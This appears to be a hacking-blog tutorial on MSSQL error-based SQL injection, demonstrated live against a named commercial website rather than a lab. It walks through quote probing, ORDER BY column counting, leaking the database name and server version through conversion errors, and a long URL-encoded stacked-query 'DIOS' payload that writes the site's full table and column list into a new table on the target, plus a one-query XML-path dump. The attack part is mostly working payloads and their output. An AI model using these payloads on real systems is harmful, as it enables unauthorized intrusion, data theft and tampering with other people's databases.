Web-PentestSQL-InjectionMSSQL

MSSQL Error Based Injection

By Zen Javanicus
Post Image
In the Name of ALLAH the Most Beneficent and the Merciful

Hey, as its been a long time i updated securityidiots. Here i will continue with the second part of MSSQL Injection. I suppose you read the tutorial before moving to this one, if not then here is the link:
MSSQL Union Based Injection
So here we are gonna start with the second tutorial of the below Series of MSSQL Injection
1. MSSQL Union Based Injection
2. MSSQL Error Based Injection
3. MSSQL Blind Injection
4. MSSQL Time Based Blind Injection
5. MSSQL Error Based Blind Injection
6. MSSQL DIOS (Dump in One Shot)
7. Pushing Files via MSSQLi
8. Remote Code Execution via MSSQLi
I wont make this tutorial very lengthy as i suppose MSSQL Error based is one of the most easy one to work with.
First of all i hope you are clear with the concept when and why to use error based SQLi, its when you are not able to get any output using Union based injection and the error is visible to you. In such case you have to use Error based Injection.

For this tutorial we will use http://www.timescanindia.in/Product.aspx?Id=7 as this site gives some problems while injecting Union based, although its still possible to inject the site with union based but still we will use error based injection here as the tutorial is all about that.

Checking the type of injection and all other deals you can find in the first part so theres no meaning of explaining the same shit again. 
http://www.timescanindia.in/Product.aspx?Id=7%27
ERROR
http://www.timescanindia.in/Product.aspx?Id=7%22
ERROR
InformationWhen both Single quote and double Quotes gives error then there are high probablities that the injection type is integer based because Single quote based then double quote do not give error and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.









Now to go ahead we need to know the comment type for MSSQL.
CommentName
--:Comment Type 1
--+:Comment Type 2
--+-:SQL Comment
/**/:Inline Comment
;%00:Null Byte
Now lets try the basic -- comment with our target
http://www.timescanindia.in/Product.aspx?Id=7--
working fine.
http://www.timescanindia.in/Product.aspx?Id=7 order by 1--
No Error
http://www.timescanindia.in/Product.aspx?Id=7 order by 100--
Here comes the error : The ORDER BY position number 100 is out of range of the number of items in the select list
Now lets inject error based injection and get out output using error.
http://www.timescanindia.in/Product.aspx?Id=7 and 1=db_name()--
Boom we got the error, and yeah the output also contains database name alongwith it.
Conversion failed when converting the nvarchar value 'timescanindia' to data type int

Yeah i know its really easy. it aint no fucking big deal like fighting with a deer while wearing a santa dress.

Fine so lets continue with it and get the version. 
http://www.timescanindia.in/Product.aspx?Id=7 and @@version=1--
Again we got an error as well as the output with the error: 
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' to data type int..
Now lets play our finishing move, we'll use our ninjutsu and finish it up.
http://www.timescanindia.in/Product.aspx?Id=7;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
Above we have used MSSQL DIOS you can find complete explanation on dios here.
Now to view the table we have created, use this query 
http://www.timescanindia.in/Product.aspx?Id=7%20and%20%28select%20output%20from%20err_dios%29=1
Again we got an error as well as the output with the error:
Well that will do the trick for us, but other than the above there are some other ways we can do an error based injection. Like getting all the tables and columns in just one query as given below:

http://www.timescanindia.in/Product.aspx?Id=7 and 1=(select+table_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(''))--
So Here we are finished with MSSQL Error Based Injection.
Newer post

Shell the web - Methods of a Ninja

Shell the web - Methods of a Ninja
Routed SQL Injection
Older post

Routed SQL Injection